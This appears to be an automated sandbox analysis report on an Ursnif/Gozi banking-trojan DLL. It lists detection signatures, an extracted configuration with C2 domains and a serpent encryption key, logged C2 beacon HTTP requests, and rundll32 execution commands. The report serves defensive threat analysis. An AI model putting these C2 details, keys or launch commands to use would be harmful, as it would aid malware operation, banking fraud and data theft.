Windows Analysis Report 3b17.dll

Overview

General Information

Sample Name: 3b17.dll
Analysis ID: 444315
MD5: 3b17fcc55cee8cbe4cd1b443f358c36d
SHA1: 45d1e652f282a94b37ac32afb62ff563afb2fb39
SHA256: 9ae13bdb906bf774982242a378a20fb25da3e29dd7b5e1acd2531562319edba6
Tags: dll, gozi

Detection

Ursnif
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Found malware configuration
Source: 00000003.00000003.286056842.0000000000800000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "ESo3IAssZzE5ysG1EIw/4HtXAsFSsy8tqEpVxnbfbMCCYrlFNqq+URa5v25Vb8Fqg7CHgZW6+XrIJ25ylHpxuJ37IEqPduLid4tbupuJSyqgtTppR4zn02IvafAxKMAHSa619wHPy17p4K0/4kj7C1qaKtM+Xh1a06NCKm5N+m786e7cPquu7R927nhH6gnnNo+As4++HjROKgvXHXtuBEcH4AtLrYsdhCKBIunRJ4/JRjUYKn0tSnPBDf+Na9jWpvJHGTOYnu1CoHdLJTA2dOf5StD7LA6zUT/gtRsdQh+Fypc8IFyYvOY0WUwFr+dLMrtodQ8p5Mt7Wi/ACSlplY8XX2NGugFn+jyVYhw+Opw=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "PNJeXnLTijShJqmR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Multi AV Scanner detection for submitted file
Source: 3b17.dll Metadefender: Detection: 22%
Source: 3b17.dll ReversingLabs: Detection: 55%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E839C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_00E839C5

Compliance:

Uses 32bit PE files
Source: 3b17.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: 3b17.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3b17.dll

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49721 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49721 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49723 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49728 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49728 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49733 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49733 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49734 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49736 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49736 -> 165.232.183.49:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ALLEGHENYHEALTHNETWORKUS
Source: global traffic HTTP traffic detected: GET /TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/BeoUjWvi9/GRgtTT2_2Fre8pZfIDlE/fPFOTkpE85cBWdt2Aor/5Y_2FWklStfFd9eU3TULSv/7l6H_2BVDc6Tn/LKJndKHH/PFJdkVMTIBMr500KWPhrAdO/8KvhNtw8HT/7mBX52dH5SplZXRyl/g96OGJKS4dVz/jB8OfmZgeb2/W3zD8P6To_2Fz1/V_2BecT6OliET_2F_2Boh/g6HDdicMqOjqFGcv/ETnCqudWareoM50/LlKXg0AU/cEv179y_2/BaWO HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6b9FMvL_2FIqp4S/ewVNte36FW/XPExsAA8VeJEhvgVb/KCeGwDykzB_2/FfJMiTYYFkB/UqSvKjZpB_2FYe/tRxQkg5XCh4uQfiEclNaO/UTPObDJYz_2FyBjB/v_2F2pSU4VWX5Hz/N9QtHdwYZ4WUrzEx5D/Q3nFD_2F2/8Ujs0VBDGr49KJ6AsZSH/EgfscPlAK393eCGdmmF/FMztWz0QhrOgK4MYRsuNHe/_2BkNcUEELtfv/x0cjHdMa17k7/_2FjZKD HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_2FuI_2FqZ2s_2FiaO0J_/2FTRLU31mRGflU2b/ZIJ0FncJBL1ujMu/UAyv0uh4NdsHQb_2Fp/7IlErLThx/qx9lbHRBIr_2BN2fcH7p/3MZS8xBk2HV8HO_2FwY/sjaecD1Ad9d4_2Bhfj7Udw/txqy4ndWQ8c2I/i_2FDCoi/J8FwQUA7HNUWWZ74vTmq4PN/8fRY05oVkC/eLBfQLcjbzJ0zm8P9/lrnxZ8213Jiq/fQMuhQcrOSv/_2FzhSntnuW3P7/C3J8_2BPrwDMXrvKewIwt/CP9ILXpGj47Z_2/F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /LQ0ImNchzaabH7Vdh_/2FtRScd2v/QQzFkXdgAhow_2FcWrEP/n3sYFzsTbYVS3adrQdv/5Nzc_2BoRJpkAsHtAz6xV3/PsE8tlG0HHtLJ/T5TqRkda/BLQo9v_2FZTJ_2FPNHoYsv1/ye7M3znq3j/msHJ000mSBJHPb7nZ/E46dHTxH_2B4/eeBIrQKxL9Y/THDXKoks2pteky/rz_2F_2F0HzAFdHANfOc3/VtFiNo945_2BUObZ/oZuZG5t2mblYFyG/ygnFakJ2W33SNUuycB/j7wv4YZIa/0Hblow_2BZFOik2zX2YB/PXGpfOrjekSAdA19ARh/ahTrlQtp6MFSLYtpjwx_2B/D_2FHvRt HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s96BBj_2BW0E7I/inPV3RC1ndWtP3TCiXWoq/7JGd2eicozVaSDqP/TIPKarKtLPkYLRx/VCo8CEXU6VSxFW20ap/EmssX5YuH/_2FmT3PaMcthev94lCLF/bWDeiN4zbJE6pfv8oTi/Qb34wmcConjidXNcLSenBo/rqyTVIe8oNi_2/FtqR6e_2/BJ_2F_2Ff8F8rmDwirrIz3L/Nk4szxk3_2/FsoXecNAHbdXzRM5b/qnqXpzn3ytbn/lcXf0S9I54h/nPX849yJE9mtRH/Mg8GQncb8LaArkE96Imgo/T60bsdjLtZH_2FnO/zpiezRZpQAYC8v0/MRTN6xcxZf9LqzW6jmrO/pZ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /J7P_2BuFqD/6ho97HFr4RP0mXM5H/ZrJ1_2BByY5Q/ab42fK_2F4S/vR5_2FWZ9gdHVf/hFgLjlRclm4jOH5T1Dh_2/Bb6OfmnpAwg0WKei/TGgUW067tNixzOx/BwPRLezaId9OtwPQlY/CkLoMrcdP/aOG78DSC7_2BjhPI9iFK/iN8ZMV2kpmYpR22nO5N/DPr4nIGLY40kIrg97zu5zK/lZpfj5ONzqtKf/Vl33ZktQ/u9goArPbUAC5CGM3eIqnvuS/s_2BLl3UAj/4ev_2F316DIi43v_2/FeCwH6Boab2B/JVucmKuDRDu/1ldPV7QmrKfn1O/3tEgr34mvlOov5etr8LcR/vS5_2Fy HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Jul 2021 14:53:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp String found in binary or memory: http://gtr.antoinfer.com/IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp String found in binary or memory: http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC
Source: ~DFF4A7B0CDF51E1130.TMP.24.dr, {2403265A-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.dr String found in binary or memory: http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6
Source: rundll32.exe, 00000003.00000002.471774654.000000000087B000.00000004.00000020.sdmp, {24032658-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.dr, ~DFDEC152A471305B20.TMP.24.dr String found in binary or memory: http://gtr.antoinfer.com/TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/B

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match (same unpacked PE, memory dump and process memory sources as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E191B9C GetProcAddress,NtCreateSection,memset, 0_2_6E191B9C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E191EC7 NtMapViewOfSection, 0_2_6E191EC7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E192485 NtQueryVirtualMemory, 0_2_6E192485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E82D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_00E82D06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E88005 NtQueryVirtualMemory, 3_2_00E88005
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6E1DE9F0 appears 35 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E1DE9F0 appears 37 times
Uses 32bit PE files
Source: 3b17.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine Classification label: mal80.troj.winDLL@18/8@6/1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E8513E CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 3_2_00E8513E
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF411F8F60C26A5FE3.TMP
Source: 3b17.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\3b17.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seatforce
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Spaceclose
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Time
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:82950 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 3b17.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 3b17.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 3b17.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 3b17.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 3b17.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 3b17.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E191F7C LoadLibraryA,GetProcAddress, 0_2_6E191F7C
PE file contains an invalid checksum
Source: 3b17.dll Static PE information: real checksum: 0xa34b8 should be: 0x9effb
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E192200 push ecx; ret 0_2_6E192209
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E192253 push ecx; ret 0_2_6E192263
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E217583 push ecx; ret 0_2_6E217596
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E87A60 push ecx; ret 3_2_00E87A69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E87DCF push ecx; ret 3_2_00E87DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E217583 push ecx; ret 3_2_6E217596

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match (same unpacked PE, memory dump and process memory sources as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6E1DE78D
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E191F7C LoadLibraryA,GetProcAddress, 0_2_6E191F7C
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E20227F mov eax, dword ptr fs:[00000030h] 0_2_6E20227F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F2120 mov eax, dword ptr fs:[00000030h] 0_2_6E1F2120
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E21E801 mov eax, dword ptr fs:[00000030h] 0_2_6E21E801
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E21E730 mov eax, dword ptr fs:[00000030h] 0_2_6E21E730
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E21E337 push dword ptr fs:[00000030h] 0_2_6E21E337
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E20227F mov eax, dword ptr fs:[00000030h] 3_2_6E20227F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1F2120 mov eax, dword ptr fs:[00000030h] 3_2_6E1F2120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E21E801 mov eax, dword ptr fs:[00000030h] 3_2_6E21E801
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E21E730 mov eax, dword ptr fs:[00000030h] 3_2_6E21E730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E21E337 push dword ptr fs:[00000030h] 3_2_6E21E337
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6E1DE78D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1DDFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6E1DDFF3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6E1F18EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6E1DE78D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1DDFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6E1DDFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1F18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6E1F18EF

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1DEBB6 cpuid 0_2_6E1DEBB6
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_6E191E8A
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E191144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_6E191144
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E84454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 3_2_00E84454
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E201C7E _free,GetTimeZoneInformation,_free, 0_2_6E201C7E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E191F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6E191F10
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE
